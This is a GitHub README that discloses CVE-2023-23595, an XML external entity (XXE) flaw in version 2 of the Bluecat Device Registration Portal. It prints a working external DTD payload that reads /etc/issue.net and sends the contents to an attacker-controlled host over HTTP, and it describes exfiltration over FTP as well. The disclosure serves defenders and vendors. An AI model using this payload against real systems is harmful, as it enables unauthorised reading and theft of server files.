Skip to content

colemanjp/XXE-Vulnerability-in-Bluecat-Device-Registration-Portal-DRP

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 

Repository files navigation

XXE Vulnerability in Bluecat Device Registration Portal (DRP) CVE-2023-23595

Summary

Bluecat device registration portal / Bluecat DRP version 2 is vulnerable to information leakage via XML External Entity Injection / XXE.

Tested on version 2.2. Version 2 is no longer supported by the vendor.

I was only able to extract single line files - /etc/issue.net for example. This appears to be a feature of Java 7 and above per https://web.archive.org/web/20230113185834/https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines

I was also able to exfiltrate single line files via outbound FTP.

Demonstration

Attacker server vps2 hosts x.xml

<!ENTITY % data SYSTEM "file:///etc/issue.net">
<!ENTITY % param1 "<!ENTITY extract SYSTEM 'http://vps2/?%data;'>">

POST to victim server re

re_burp.png

Read content of exfiltrated file /etc/issue.net in web log on attacker server vps2

re_log.png

Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23595

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published